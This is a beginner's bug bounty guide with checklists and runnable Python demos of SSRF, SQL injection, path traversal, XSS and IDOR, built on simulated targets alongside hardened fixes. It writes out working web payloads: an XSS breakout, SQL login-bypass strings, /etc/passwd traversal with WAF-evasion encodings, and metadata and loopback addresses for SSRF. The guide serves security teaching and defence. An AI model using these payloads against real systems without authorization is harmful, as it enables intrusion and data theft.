Bug Bounty Hunting

A simple and minimalist guide for getting started in security research, specifically in bug bounty hunting.

What to do to start in Bug Bounty Hunting or Security Research

Essential Checklist

  • Discovery

  • Code Review

  • Authentication & Authorization attacks

  • Function-specific / business logic attacks

  • Technology-specific attacks

  • SSRF

  • IDORs

  • Injection (Headers, Cookies, APIs, Parameters, Values)

  • Other attacks (depends on the app)

  • Reporting and Collecting the Bounty

Bugs & Vulnerabilities Checklist

  • Subdomain Recon

    • Subdomain Takeover

    • Open Ports

      • Admin panel

        • Default Credentials

  • Find Parameters

    • XSS

    • Path Traversal

      • LFI

      • RFI

    • Command Injection

    • Open Redirect

    • SQL Injection

    • NoSQL Injection

    • SSTI (Server-Side Template Injection)

  • Cloud Enumeration

    • Open Buckets (AWS, Azure, Google Cloud, etc...)

  • Fuzzing Common Paths

    • 401/403 Bypass

  • Directories and Endpoints

    • Login Panels

    • Forms and Inputs

    • Information Disclosure

    • IDOR

Top Vulnerabilities 2024

  • Authentication & Authorization attacks

  • Manual / Business Logic Error

  • NoSQL Injection (MongoDB & Redis)

  • Cross-site scripting (XSS)

  • Insecure direct object reference (IDOR)

  • Information Disclosure

  • SQL Injection

  • API Hacking

HackerOne Top 10 Vulnerabilities 2023

  • Improper access control - generic

  • Information Disclosure

  • Cross-site scripting (XSS) - Reflected

  • Insecure direct object reference (IDOR)

  • Privilege Escalation

  • Cross-site scripting (XSS) - Stored

  • Misconfiguration

  • Improper authentication - generic

  • Business logic errors

  • Cross-site scripting (XSS) - DOM

https://www.hackerone.com/top-ten-vulnerabilities

Where to look for Vulnerabilities

Where to look for SSRF

  • In query-string or body parameters with names like "redirect", "url", "next", etc.

  • When the server fetches resources on the user's behalf, such as JS files, CSS or images, from a URL the user controls.

  • App-specific features that "check the status" of a URL or host, such as link previews, health checks or import-from-URL functions.

  • The goal is to reach the internal network from the server: pivot from the user-supplied URL to hosts, files and services that are only reachable from inside (in cloud-hosted targets, this includes the instance metadata endpoint).
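The server side of the issue, as an added example that is not part of the original guide: a "fetch this URL" feature that takes the user's URL as-is, next to a hardened version that validates the address the hostname actually resolves to rather than the hostname string. The DNS resolver and HTTP client are injected, and the names in FAKE_DNS (example.com, metadata.internal, intranet.corp) and their addresses are constructed so the example runs offline.

```python
import ipaddress
from urllib.parse import urlsplit

def is_public_address(ip_text):
    """True only for globally routable unicast addresses (no loopback, private,
    link-local, unspecified or multicast ranges)."""
    ip = ipaddress.ip_address(ip_text)
    return ip.is_global and not ip.is_multicast

def resolve_target(url, resolver):
    """Return the IP the server would connect to for this URL.
    `resolver(host) -> ip string` is injected; real code would do a DNS lookup."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("unsupported scheme: %r" % parts.scheme)
    if not parts.hostname:
        raise ValueError("no host in URL")
    return resolver(parts.hostname)

def fetch_preview_vulnerable(url, http_get):
    """Fetches whatever URL the user supplied: the classic SSRF sink."""
    return http_get(url)

def fetch_preview_safe(url, http_get, resolver):
    """Validate the resolved address, not the hostname string, before fetching."""
    ip = resolve_target(url, resolver)
    if not is_public_address(ip):
        raise PermissionError("refusing to fetch internal address %s" % ip)
    # Real code should also connect to `ip` directly (sending the original Host
    # header) so a second DNS lookup cannot be rebound to an internal address.
    return http_get(url)

# --- constructed stand-ins so the example runs offline (hypothetical names) --
FAKE_DNS = {
    "example.com": "93.184.216.34",
    "localhost": "127.0.0.1",
    "metadata.internal": "169.254.169.254",
    "intranet.corp": "10.0.0.5",
}

def fake_resolver(host):
    """Normalizes IP literals, including decimal/hex forms such as 2130706433
    or 0x7f000001 that urllib leaves untouched, and looks names up in FAKE_DNS."""
    try:
        return str(ipaddress.ip_address(int(host, 0)))
    except ValueError:
        pass
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return FAKE_DNS[host]

def fake_http_get(url):
    return "fetched " + url

def blocked_by_safe_fetch(url):
    """True if the hardened fetcher refuses the URL."""
    try:
        fetch_preview_safe(url, fake_http_get, fake_resolver)
        return False
    except PermissionError:
        return True

if __name__ == "__main__":
    for u in ("http://example.com/", "http://localhost:8080/admin",
              "http://169.254.169.254/latest/meta-data/", "http://0x7f000001/",
              "http://[::1]/", "http://intranet.corp/"):
        print("%-45s blocked=%s" % (u, blocked_by_safe_fetch(u)))
```

When testing a target, the hex and decimal IP forms and the IPv6 loopback are exactly the variants worth sending against a "url" parameter: a filter that only string-matches "127.0.0.1" or "localhost" lets them through, while the resolved-address check above does not.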

Where to look for SQLi

  • Forms sent as POST requests: if injecting a single quote makes the response return a 500 (Internal Server Error) instead of a normal page, the input likely reached a query unescaped. A 500 alone is not proof, so confirm with a boolean or time-based payload.

  • Inputs that are used to query the database, such as usernames, passwords, IDs, search terms, etc.

  • Always try to inject into these queries, both to confirm that the input reaches the database and to learn how to read data from it or execute your own queries.
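Both signals described above, as an added example that is not from the original guide: a login query built by string concatenation next to its parameterized fix, run against an in-memory SQLite database with constructed users. The lone quote crashes the vulnerable query (which a web app would surface as the 500 mentioned above), and the comment-based bypass logs in without the password.

```python
import sqlite3

def make_db():
    """Constructed sample data: two users with demo-only plaintext passwords."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cret!"), ("alice", "hunter2")])
    return conn

def vulnerable_login(conn, username, password):
    """Builds the query by concatenation, so user input becomes SQL syntax."""
    query = ("SELECT id FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None

def safe_login(conn, username, password):
    """Parameterized query: input is bound as data and never parsed as SQL."""
    query = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None

def probe_quote(login, conn, username="admin"):
    """The '500 signal': append a single quote to the username.
    Returns 'error' (query broke: injection likely), 'allowed' or 'denied'."""
    try:
        return "allowed" if login(conn, username + "'", "x") else "denied"
    except sqlite3.OperationalError:
        return "error"

if __name__ == "__main__":
    db = make_db()
    print("quote probe, vulnerable:", probe_quote(vulnerable_login, db))
    print("quote probe, safe:      ", probe_quote(safe_login, db))
    # Comment out the password check: admin' --
    print("bypass, vulnerable:", vulnerable_login(db, "admin' --", "wrong"))
    print("bypass, safe:      ", safe_login(db, "admin' --", "wrong"))
    # Tautology in both fields: ' OR '1'='1
    print("tautology, vulnerable:", vulnerable_login(db, "' OR '1'='1", "' OR '1'='1"))
```

The `-- ` comment syntax and the `'1'='1` tautology are the two payloads to try right after the quote probe errors out; which one works tells you how the rest of the query is shaped.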

Where to look for Business Logic Errors

  • These are unique bugs found with original techniques, by trying different approaches against the application, so the majority of these attacks depend on the specific app and on the attacker's creativity.

  • They can be found by analyzing the source code and trying to abuse specific features of the application.

  • Most business logic errors appear when you break the intended flow of the application (skipping steps, replaying requests, changing values the server trusts) and then exploit what the application does next.

Where to look for LFI or RFI (Path Traversal)

  • To perform path traversal, first identify where the application loads an internal file, e.g. file://../../app/index.php. This generally occurs in endpoints with parameters like "file", "view", "download", "doc", etc.

  • Try different encodings to bypass the WAF: HTML entities, Unicode, URL, double URL, hex, etc.

  • Try path traversal by injecting ..0x2f..0x2f..0x2f..0x2f../etc/passwd (on Linux; 0x2f is the hex code for "/", and ..%2f is the URL-encoded form), or file:///etc/passwd, etc.
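The traversal above against a simulated download handler, as an added example that is not part of the original guide: the vulnerable reader decodes the parameter (twice, as a web server plus application stack often does) and joins it onto the web root with no check; the hardened reader canonicalizes the result and requires it to stay under the web root. The directory layout, the file names and the "..0x2f" variant's behaviour are constructed for this example.

```python
import os
import tempfile
from urllib.parse import unquote

def traversal_payloads(target="secret.txt", depth=2):
    """One traversal in several encodings, for WAF/normalization bypass."""
    return {
        "plain":       "../" * depth + target,
        "url":         "..%2f" * depth + target,
        "double_url":  "..%252f" * depth + target,
        "dot_enc":     "%2e%2e/" * depth + target,
        "hex_literal": "..0x2f" * depth + target,  # the guide's variant; only works if the app itself maps 0x2f to '/'
    }

def make_sandbox():
    """Constructed layout: <tmp>/secret.txt outside <tmp>/www/public (the web root)."""
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "www", "public")
    os.makedirs(webroot)
    with open(os.path.join(webroot, "index.html"), "w") as f:
        f.write("<h1>hello</h1>")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("TOP SECRET")
    return webroot

def _decode(user_path):
    # Many stacks decode once at the web server and once more in the app,
    # which is why double-URL-encoded payloads get through.
    return unquote(unquote(user_path))

def vulnerable_read(webroot, user_path):
    """Joins the decoded path straight onto the web root: ../ walks out of it."""
    path = os.path.join(webroot, _decode(user_path))
    with open(path) as f:
        return f.read()

def safe_read(webroot, user_path):
    """Canonicalize, then require the result to stay under the web root."""
    base = os.path.realpath(webroot)
    path = os.path.realpath(os.path.join(base, _decode(user_path)))
    if os.path.commonpath([base, path]) != base:
        raise PermissionError("path escapes web root: %r" % user_path)
    with open(path) as f:
        return f.read()

def safe_read_blocks(webroot, user_path):
    """True if the hardened reader refuses the path."""
    try:
        safe_read(webroot, user_path)
        return False
    except PermissionError:
        return True

if __name__ == "__main__":
    webroot = make_sandbox()
    for name, payload in traversal_payloads().items():
        for reader in (vulnerable_read, safe_read):
            try:
                result = reader(webroot, payload)
            except OSError as e:            # PermissionError and FileNotFoundError
                result = type(e).__name__
            print("%-11s %-16s -> %s" % (name, reader.__name__, result))
```

Note that the check is on the canonical path, not on the presence of "../" in the input: filtering the string would be defeated by exactly the encodings the payload table lists.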

Where to look for XSS and how to craft it (Basic)

  • When a value you submit for a key/parameter is reflected in the DOM (HTML), try to inject code that breaks out of the surrounding HTML tag and build your own XSS payload. For example: >;'</input><svg ONly ONLoad=confirm()>//

  • To understand how to craft XSS payloads you need to: 1. know the HTML tags, 2. understand the basics of JavaScript, and 3. have fun crafting payloads.

  • To bypass the most common WAF rules, encode characters in a form that the back-end (or the browser, for HTML entities) will decode. Some of these encodings are: HTML entities, hex, URL and double URL encoding, Unicode escapes, and more.

  • Keep in mind: "if the WAF is too hard to bypass, try another endpoint". (Not all endpoints are vulnerable, and the WAF may not cover all of them.)
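The first step of crafting a payload, as an added example that is not part of the original guide: submit a canary containing the characters a breakout needs, then read back which of them the page returned raw, HTML-encoded or stripped, and pick the vector accordingly. encode_variants() produces the WAF-bypass encodings listed above for a chosen payload. The marker "zq9" and the four response bodies are constructed stand-ins for real endpoints.

```python
import html
from urllib.parse import quote

MARK = "zq9"            # assumed unique marker used to locate the reflection
SPECIALS = '<>"\'/'     # characters a breakout typically needs

def build_canary():
    """Probe value to submit in the parameter: marker, special chars, marker."""
    return MARK + SPECIALS + MARK

def _entity_forms(ch):
    """Lower-cased HTML entity spellings of one character."""
    return {html.escape(ch, quote=True).lower(), "&#%d;" % ord(ch), "&#x%x;" % ord(ch)}

def reflection_context(body):
    """For each special character, report 'raw', 'encoded' or 'stripped'
    based on how the canary came back in the response body."""
    start = body.find(MARK)
    end = body.find(MARK, start + len(MARK)) if start != -1 else -1
    if start == -1 or end == -1:
        return {}                              # not reflected at all
    reflected = body[start + len(MARK):end].lower()
    ctx = {}
    for ch in SPECIALS:
        if ch in reflected:
            ctx[ch] = "raw"
        elif any(form in reflected for form in _entity_forms(ch) if form != ch):
            ctx[ch] = "encoded"
        else:
            ctx[ch] = "stripped"
    return ctx

def suggest_vector(ctx):
    """Pick the breakout the reflection allows. A raw quote only helps when the
    reflection sits inside an attribute value; a raw '/' alone is not enough."""
    if ctx.get("<") == "raw" and ctx.get(">") == "raw":
        return "tag injection"          # e.g. the </input><svg onload=...> payload above
    if ctx.get('"') == "raw" or ctx.get("'") == "raw":
        return "attribute breakout"
    return "no direct breakout"

def encode_variants(payload):
    """The encodings listed above. Which one works depends on who decodes it:
    the web server/back-end (URL forms), the browser (entities in HTML text and
    attribute values), or a JavaScript string literal (\\u escapes)."""
    return {
        "url":          quote(payload, safe=""),
        "double_url":   quote(quote(payload, safe=""), safe=""),
        "html_decimal": "".join("&#%d;" % ord(c) for c in payload),
        "html_hex":     "".join("&#x%x;" % ord(c) for c in payload),
        "js_unicode":   "".join("\\u%04x" % ord(c) for c in payload),
    }

# Constructed responses standing in for four different endpoints.
SAMPLE_RESPONSES = {
    "unescaped_text":  '<p>Results for zq9<>"\'/zq9</p>',
    "html_escaped":    '<p>Results for zq9&lt;&gt;&quot;&#x27;/zq9</p>',
    "attr_quotes_raw": '<input value="zq9&lt;&gt;"\'/zq9">',
    "stripped":        '<p>Results for zq9zq9</p>',
}

if __name__ == "__main__":
    print("submit:", build_canary())
    for name, body in SAMPLE_RESPONSES.items():
        ctx = reflection_context(body)
        print("%-16s %s -> %s" % (name, ctx, suggest_vector(ctx)))
    for enc, value in encode_variants("<svg onload=confirm()>").items():
        print("%-12s %s" % (enc, value))
```

The "attr_quotes_raw" case is the one to recognize: the page encodes angle brackets but not quotes, so the tag-based payload above fails while closing the attribute and adding an event handler still works.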

Where to look for IDOR

  • "IDOR" or "Insecure Direct Object Reference" is a vulnerability that occurs when modifying a value such as an ID or object identifier gives the attacker unauthorized access to another user's data. Typically these are BOLA (Broken Object Level Authorization) bugs.

  • Example: with Burp Suite or Caido you intercept a request whose path looks like /api/v2/current/view. There are several things to probe: 1. change v2 to v1, v0 or v3, or remove the version segment entirely; 2. replace current with an email, an application user ID, etc.

  • You can also try changing view to edit, delete or create. These are among the techniques that most often work against vulnerable applications when the back-end does not check that the caller is authorized for the specific object it returns.
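The mutations above turned into code, as an added example that is not part of the original guide: idor_candidates() derives the version, identifier and action variants from a captured path, and check_idor() confirms a finding the way a triager would accept it, by showing that the attacker's session receives exactly the object the victim's session receives. HTTP is replaced by an injected `send(path, session)`; the fake API, its users, tokens and the /api/v2/<id>/view route are constructed for this example.

```python
import re
from urllib.parse import quote

VERSION_RE = re.compile(r"^v\d+$")
SELF_REFS = ("current", "me", "self")

def idor_candidates(path, identifiers, actions=("edit", "delete", "create")):
    """Candidate paths derived from a captured one, following the three rules:
    1. swap the API version (v2 -> v0/v1/v3) or drop the segment entirely;
    2. replace a self-reference such as 'current' with each known identifier;
    3. swap the trailing action (view -> edit/delete/create)."""
    segs = [s for s in path.split("/") if s]
    out = []
    for i, seg in enumerate(segs):
        head, tail = segs[:i], segs[i + 1:]
        if VERSION_RE.match(seg):
            for v in ("v0", "v1", "v2", "v3"):
                if v != seg:
                    out.append("/" + "/".join(head + [v] + tail))
            out.append("/" + "/".join(head + tail))
        if seg in SELF_REFS:
            for ident in identifiers:
                out.append("/" + "/".join(head + [quote(str(ident), safe="")] + tail))
    for action in actions:
        if action != segs[-1]:
            out.append("/" + "/".join(segs[:-1] + [action]))
    return list(dict.fromkeys(out))          # de-duplicate, keep order

def check_idor(send, path, attacker_session, victim_session):
    """True if the attacker's session gets exactly the object the victim's
    session gets for `path`. `send(path, session) -> (status, body)`.
    Compare against a public/static endpoint first so responses that are
    identical for everyone are not flagged."""
    v_status, v_body = send(path, victim_session)
    if v_status != 200:
        return False
    a_status, a_body = send(path, attacker_session)
    return a_status == 200 and a_body == v_body

def find_idors(send, captured_path, identifiers, attacker_session, victim_session):
    return [p for p in idor_candidates(captured_path, identifiers)
            if check_idor(send, p, attacker_session, victim_session)]

# --- constructed fake API (hypothetical users, tokens and route) ------------
USERS = {
    1001: {"id": 1001, "email": "victim@example.com"},
    1002: {"id": 1002, "email": "attacker@example.com"},
}
SESSIONS = {"tok_victim": 1001, "tok_attacker": 1002}
ROUTE = re.compile(r"^/api/v2/([^/]+)/view$")

def _lookup(path, session):
    """Returns (status, caller_id, requested_id) for the fake route."""
    caller = SESSIONS.get(session)
    if caller is None:
        return 401, None, None
    m = ROUTE.match(path)
    if not m:
        return 404, None, None
    ref = m.group(1)
    uid = caller if ref == "current" else (int(ref) if ref.isdigit() else None)
    if uid not in USERS:
        return 404, None, None
    return 200, caller, uid

def fake_send_vulnerable(path, session):
    """BOLA: returns whichever object the path names, no ownership check."""
    status, caller, uid = _lookup(path, session)
    return (status, str(USERS[uid])) if status == 200 else (status, "")

def fake_send_fixed(path, session):
    """Same route, but the requested object must belong to the caller."""
    status, caller, uid = _lookup(path, session)
    if status == 200 and uid != caller:
        return 403, ""
    return (status, str(USERS[uid])) if status == 200 else (status, "")

if __name__ == "__main__":
    for p in idor_candidates("/api/v2/current/view", [1001, "victim@example.com"]):
        print(p)
    args = ("/api/v2/current/view", [1001], "tok_attacker", "tok_victim")
    print("vulnerable:", find_idors(fake_send_vulnerable, *args))
    print("fixed:     ", find_idors(fake_send_fixed, *args))
```

The two-session comparison is also what makes the report credible: a request made with your own account, a second account's identifier and the second account's data in the response is the evidence a program expects.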
